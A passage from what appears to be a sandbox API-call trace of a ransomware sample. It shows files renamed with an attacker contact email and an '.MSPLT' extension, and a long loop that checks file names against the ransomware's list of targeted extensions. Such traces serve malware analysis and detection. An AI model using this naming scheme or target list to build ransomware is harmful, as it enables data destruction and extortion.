ftLastWriteTime.dwLowDateTime=0x5c595da7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="Print.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PRINTI~1.MSP")) returned 1 [0284.356] lstrlenW (lpString="Print.ico.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 53 [0284.356] lstrlenW (lpString=".1cd") returned 4 [0284.356] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0284.356] lstrlenW (lpString=".3ds") returned 4 [0284.356] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0284.356] lstrlenW (lpString=".3fr") returned 4 [0284.356] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0284.356] lstrlenW (lpString=".3g2") returned 4 [0284.356] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0284.356] lstrlenW (lpString=".3gp") returned 4 [0284.356] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0284.357] lstrlenW (lpString=".7z") returned 3 [0284.357] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0284.357] lstrlenW (lpString=".accda") returned 6 [0284.357] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0284.357] lstrlenW (lpString=".accdb") returned 6 [0284.357] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0284.357] lstrlenW (lpString=".accdc") returned 6 [0284.357] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0284.357] lstrlenW (lpString=".accde") returned 6 [0284.357] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0284.357] lstrlenW (lpString=".accdt") returned 6 [0284.357] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0284.357] lstrlenW (lpString=".accdw") returned 6 [0284.357] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0284.357] lstrlenW (lpString=".adb") returned 4 [0284.357] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0284.357] lstrlenW (lpString=".adp") returned 4 [0284.357] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0284.357] lstrlenW (lpString=".ai") returned 3 [0284.357] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0284.357] lstrlenW (lpString=".ai3") returned 4 [0284.357] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0284.357] lstrlenW (lpString=".ai4") returned 4 [0284.357] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0284.357] lstrlenW (lpString=".ai5") returned 4 [0284.357] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".ai6") returned 4 [0284.358] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".ai7") returned 4 [0284.358] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".ai8") returned 4 [0284.358] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".anim") returned 5 [0284.358] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0284.358] lstrlenW (lpString=".arw") returned 4 [0284.358] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".as") returned 3 [0284.358] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0284.358] lstrlenW (lpString=".asa") returned 4 [0284.358] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".asc") returned 4 [0284.358] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".ascx") returned 5 [0284.358] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0284.358] lstrlenW (lpString=".asm") returned 4 [0284.358] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".asmx") returned 5 [0284.358] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0284.358] lstrlenW (lpString=".asp") returned 4 [0284.358] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0284.358] lstrlenW (lpString=".aspx") returned 5 [0284.358] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0284.359] lstrlenW (lpString=".asr") returned 4 [0284.359] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".asx") returned 4 [0284.359] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".avi") returned 4 [0284.359] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".avs") returned 4 [0284.359] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".backup") returned 7 [0284.359] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0284.359] lstrlenW (lpString=".bak") returned 4 [0284.359] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".bay") returned 4 [0284.359] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".bd") returned 3 [0284.359] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0284.359] lstrlenW (lpString=".bin") returned 4 [0284.359] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".bmp") returned 4 [0284.359] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".bz2") returned 4 [0284.359] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0284.359] lstrlenW (lpString=".c") returned 2 [0284.359] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0284.359] lstrlenW (lpString=".cdr") returned 4 [0284.359] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".cer") returned 4 [0284.360] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".cf") returned 3 [0284.360] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0284.360] lstrlenW (lpString=".cfc") returned 4 [0284.360] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".cfm") returned 4 [0284.360] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".cfml") returned 5 [0284.360] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0284.360] lstrlenW (lpString=".cfu") returned 4 [0284.360] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".chm") returned 4 [0284.360] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".cin") returned 4 [0284.360] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".class") returned 6 [0284.360] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0284.360] lstrlenW (lpString=".clx") returned 4 [0284.360] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".config") returned 7 [0284.360] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0284.360] lstrlenW (lpString=".cpp") returned 4 [0284.360] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".cr2") returned 4 [0284.360] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0284.360] lstrlenW (lpString=".crt") returned 4 [0284.360] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".crw") returned 4 [0284.361] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".cs") returned 3 [0284.361] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0284.361] lstrlenW (lpString=".css") returned 4 [0284.361] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".csv") returned 4 [0284.361] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".cub") returned 4 [0284.361] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".dae") returned 4 [0284.361] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".dat") returned 4 [0284.361] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".db") returned 3 [0284.361] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0284.361] lstrlenW (lpString=".dbf") returned 4 [0284.361] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".dbx") returned 4 [0284.361] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".dc3") returned 4 [0284.361] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".dcm") returned 4 [0284.361] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".dcr") returned 4 [0284.361] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0284.361] lstrlenW (lpString=".der") returned 4 [0284.362] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0284.362] lstrlenW (lpString=".dib") returned 4 [0284.362] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0284.362] lstrlenW (lpString=".dic") returned 4 [0284.362] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0284.362] lstrlenW (lpString=".dif") returned 4 [0284.362] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0284.362] lstrlenW (lpString=".divx") returned 5 [0284.362] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0284.362] lstrlenW (lpString=".djvu") returned 5 [0284.362] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0284.362] lstrlenW (lpString=".dng") returned 4 [0284.362] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0284.362] lstrlenW (lpString=".doc") returned 4 [0284.362] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0284.362] lstrlenW (lpString=".docm") returned 5 [0284.362] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0284.362] lstrlenW (lpString=".docx") returned 5 [0284.362] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0284.362] lstrlenW (lpString=".dot") returned 4 [0284.362] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0284.362] lstrlenW (lpString=".dotm") returned 5 [0284.362] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0284.362] lstrlenW (lpString=".dotx") returned 5 [0284.362] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0284.363] lstrlenW (lpString=".dpx") returned 4 [0284.363] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".dqy") returned 4 [0284.363] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".dsn") returned 4 [0284.363] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".dt") returned 3 [0284.363] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0284.363] lstrlenW (lpString=".dtd") returned 4 [0284.363] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".dwg") returned 4 [0284.363] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".dwt") returned 4 [0284.363] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".dx") returned 3 [0284.363] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0284.363] lstrlenW (lpString=".dxf") returned 4 [0284.363] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".edml") returned 5 [0284.363] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0284.363] lstrlenW (lpString=".efd") returned 4 [0284.363] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".elf") returned 4 [0284.363] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0284.363] lstrlenW (lpString=".emf") returned 4 [0284.363] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".emz") returned 4 [0284.364] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".epf") returned 4 [0284.364] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".eps") returned 4 [0284.364] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".epsf") returned 5 [0284.364] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0284.364] lstrlenW (lpString=".epsp") returned 5 [0284.364] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0284.364] lstrlenW (lpString=".erf") returned 4 [0284.364] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".exr") returned 4 [0284.364] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".f4v") returned 4 [0284.364] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".fido") returned 5 [0284.364] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0284.364] lstrlenW (lpString=".flm") returned 4 [0284.364] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".flv") returned 4 [0284.364] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".frm") returned 4 [0284.364] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".fxg") returned 4 [0284.364] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0284.364] lstrlenW (lpString=".geo") returned 4 [0284.364] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".gif") returned 4 [0284.365] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".grs") returned 4 [0284.365] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".gz") returned 3 [0284.365] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0284.365] lstrlenW (lpString=".h") returned 2 [0284.365] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0284.365] lstrlenW (lpString=".hdr") returned 4 [0284.365] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".hpp") returned 4 [0284.365] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".hta") returned 4 [0284.365] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".htc") returned 4 [0284.365] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".htm") returned 4 [0284.365] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".html") returned 5 [0284.365] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0284.365] lstrlenW (lpString=".icb") returned 4 [0284.365] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".ics") returned 4 [0284.365] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".iff") returned 4 [0284.365] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0284.365] lstrlenW (lpString=".inc") returned 4 [0284.366] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0284.366] lstrlenW (lpString=".indd") returned 5 [0284.366] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0284.366] lstrlenW (lpString=".ini") returned 4 [0284.366] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0284.366] lstrlenW (lpString=".iqy") returned 4 [0284.367] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".j2c") returned 4 [0284.367] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".j2k") returned 4 [0284.367] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".java") returned 5 [0284.367] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0284.367] lstrlenW (lpString=".jp2") returned 4 [0284.367] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".jpc") returned 4 [0284.367] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".jpe") returned 4 [0284.367] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".jpeg") returned 5 [0284.367] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0284.367] lstrlenW (lpString=".jpf") returned 4 [0284.367] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".jpg") returned 4 [0284.367] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".jpx") returned 4 [0284.367] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".js") returned 3 [0284.367] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0284.367] lstrlenW (lpString=".jsf") returned 4 [0284.367] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0284.367] lstrlenW (lpString=".json") returned 5 [0284.367] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0284.368] lstrlenW (lpString=".jsp") returned 4 [0284.368] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".kdc") returned 4 [0284.368] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".kmz") returned 4 [0284.368] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".kwm") returned 4 [0284.368] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".lasso") returned 6 [0284.368] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0284.368] lstrlenW (lpString=".lbi") returned 4 [0284.368] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".lgf") returned 4 [0284.368] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".lgp") returned 4 [0284.368] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".log") returned 4 [0284.368] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".m1v") returned 4 [0284.368] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".m4a") returned 4 [0284.368] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".m4v") returned 4 [0284.368] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0284.368] lstrlenW (lpString=".max") returned 4 [0284.369] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".md") returned 3 [0284.369] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0284.369] lstrlenW (lpString=".mda") returned 4 [0284.369] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mdb") returned 4 [0284.369] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mde") returned 4 [0284.369] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mdf") returned 4 [0284.369] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mdw") returned 4 [0284.369] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mef") returned 4 [0284.369] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mft") returned 4 [0284.369] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mfw") returned 4 [0284.369] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mht") returned 4 [0284.369] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mhtml") returned 6 [0284.369] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0284.369] lstrlenW (lpString=".mka") returned 4 [0284.369] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0284.369] lstrlenW (lpString=".mkidx") returned 6 [0284.370] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0284.370] lstrlenW (lpString=".mkv") returned 4 [0284.370] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".mos") returned 4 [0284.370] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".mov") returned 4 [0284.370] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".mp3") returned 4 [0284.370] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".mp4") returned 4 [0284.370] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".mpeg") returned 5 [0284.370] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0284.370] lstrlenW (lpString=".mpg") returned 4 [0284.370] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".mpv") returned 4 [0284.370] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".mrw") returned 4 [0284.370] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".msg") returned 4 [0284.370] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".mxl") returned 4 [0284.370] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".myd") returned 4 [0284.370] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0284.370] lstrlenW (lpString=".myi") returned 4 [0284.371] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".nef") returned 4 [0284.371] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".nrw") returned 4 [0284.371] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".obj") returned 4 [0284.371] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".odb") returned 4 [0284.371] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".odc") returned 4 [0284.371] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".odm") returned 4 [0284.371] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".odp") returned 4 [0284.371] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".ods") returned 4 [0284.371] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".oft") returned 4 [0284.371] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".one") returned 4 [0284.371] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0284.371] lstrlenW (lpString=".onepkg") returned 7 [0284.371] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0284.371] lstrlenW (lpString=".onetoc2") returned 8 [0284.372] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0284.372] lstrlenW (lpString=".opt") returned 4 [0284.372] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".oqy") returned 4 [0284.372] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".orf") returned 4 [0284.372] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".p12") returned 4 [0284.372] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".p7b") returned 4 [0284.372] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".p7c") returned 4 [0284.372] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".pam") returned 4 [0284.372] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".pbm") returned 4 [0284.372] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".pct") returned 4 [0284.372] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".pcx") returned 4 [0284.372] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".pdd") returned 4 [0284.372] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".pdf") returned 4 [0284.372] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0284.372] lstrlenW (lpString=".pdp") returned 4 [0284.373] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0284.373] lstrlenW (lpString=".pef") returned 4 [0284.373] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0284.373] lstrlenW (lpString=".pem") returned 4 [0284.373] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0284.373] lstrlenW (lpString=".pff") returned 4 [0284.373] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0284.373] lstrlenW (lpString=".pfm") returned 4 [0284.373] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0284.373] lstrlenW (lpString=".pfx") returned 4 [0284.373] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0284.373] lstrlenW (lpString=".pgm") returned 4 [0284.373] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0284.373] lstrlenW (lpString=".php") returned 4 [0284.373] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0284.373] lstrlenW (lpString=".php3") returned 5 [0284.373] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0284.373] lstrlenW (lpString=".php4") returned 5 [0284.373] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0284.373] lstrlenW (lpString=".php5") returned 5 [0284.373] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0284.373] lstrlenW (lpString=".phtml") returned 6 [0284.373] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0284.373] lstrlenW (lpString=".pict") returned 5 [0284.374] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0284.374] lstrlenW (lpString=".pl") returned 3 [0284.374] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0284.374] lstrlenW (lpString=".pls") returned 4 [0284.374] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0284.374] lstrlenW (lpString=".pm") returned 3 [0284.374] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0284.374] lstrlenW (lpString=".png") returned 4 [0284.374] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0284.374] lstrlenW (lpString=".pnm") returned 4 [0284.374] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0284.374] lstrlenW (lpString=".pot") returned 4 [0284.374] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0284.374] lstrlenW (lpString=".potm") returned 5 [0284.374] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned 